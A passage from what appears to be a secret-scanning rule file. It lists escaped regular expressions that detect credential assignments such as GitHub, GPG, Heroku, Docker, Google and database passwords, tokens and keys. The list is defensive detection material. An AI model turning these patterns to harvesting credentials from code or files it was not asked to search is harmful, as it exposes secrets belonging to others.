\"(?i)[\\\"']?keystore[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?kafka[_-]?rest[_-]?url[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?kafka[_-]?instance[_-]?name[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?kafka[_-]?admin[_-]?url[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?jwt[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?jdbc:mysql[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?jdbc[_-]?host[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?jdbc[_-]?databaseurl[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?itest[_-]?gh[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ios[_-]?docs[_-]?deploy[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?internal[_-]?secrets[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?integration[_-]?test[_-]?appid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?integration[_-]?test[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?index[_-]?name[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ij[_-]?repo[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ij[_-]?repo[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?hub[_-]?dxia2[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?homebrew[_-]?github[_-]?api[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?hockeyapp[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?heroku[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?heroku[_-]?email[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?heroku[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?hb[_-]?codesign[_-]?key[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?hb[_-]?codesign[_-]?gpg[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?hab[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?hab[_-]?auth[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?grgit[_-]?user[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gren[_-]?github[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gradle[_-]?signing[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gradle[_-]?signing[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gradle[_-]?publish[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gradle[_-]?publish[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gpg[_-]?secret[_-]?keys[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gpg[_-]?private[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gpg[_-]?passphrase[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gpg[_-]?ownertrust[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gpg[_-]?keyname[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gpg[_-]?key[_-]?name[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?google[_-]?private[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?google[_-]?maps[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?google[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?google[_-]?client[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?google[_-]?client[_-]?email[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?google[_-]?account[_-]?type[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gogs[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gitlab[_-]?user[_-]?email[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?tokens[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?repo[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?release[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?pwd[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?oauth[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?oauth[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?hunter[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?hunter[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?deployment[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?deploy[_-]?hb[_-]?doc[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?auth[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?auth[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?api[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?access[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?git[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?git[_-]?name[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?git[_-]?email[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?git[_-]?committer[_-]?name[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?git[_-]?committer[_-]?email[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?git[_-]?author[_-]?name[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?git[_-]?author[_-]?email[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ghost[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ghb[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gh[_-]?unstable[_-]?oauth[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gh[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gh[_-]?repo[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gh[_-]?oauth[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gh[_-]?oauth[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gh[_-]?next[_-]?oauth[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gh[_-]?email[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gh[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gcs[_-]?bucket[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gcr[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gcloud[_-]?service[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gcloud[_-]?project[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gcloud[_-]?bucket[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ftp[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ftp[_-]?user[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ftp[_-]?pw[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ftp[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ftp[_-]?login[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ftp[_-]?host[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?fossa[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?flickr[_-]?api[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?flickr[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?flask[_-]?secret[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?firefox[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?firebase[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?firebase[_-]?project[_-]?develop[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?firebase[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?firebase[_-]?api[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?firebase[_-]?api[_-]?json[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?file[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?exp[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?eureka[_-]?awssecretkey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?env[_-]?sonatype[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?env[_-]?secret[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?env[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?env[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?env[_-]?heroku[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?env[_-]?github[_-]?oauth[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?end[_-]?user[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?encryption[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?elasticsearch[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?elastic[_-]?cloud[_-]?auth[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?dsonar[_-]?projectkey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?dsonar[_-]?login[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?droplet[_-]?travis[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?dropbox[_-]?oauth[_-]?bearer[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?doordash[_-]?auth[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?dockerhubpassword[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?dockerhub[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?docker[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?docker[_-]?postgres[_-]?url[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?docker[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?docker[_-]?passwd[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?docker[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?docker[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?docker[_-]?hub[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?digitalocean[_-]?ssh[_-]?key[_-]?ids[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?digitalocean[_-]?ssh[_-]?key[_-]?body[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?digitalocean[_-]?access[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?dgpg[_-]?passphrase[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?deploy[_-]?user[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?deploy[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?deploy[_-]?secure[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?deploy[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ddgc[_-]?github[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ddg[_-]?test[_-]?email[_-]?pw[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ddg[_-]?test[_-]?email[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?db[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?db[_-]?user[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?db[_-]?pw[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?db[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?db[_-]?host[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?db[_-]?database[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?db[_-]?connection[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?datadog[_-]?app[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?datadog[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 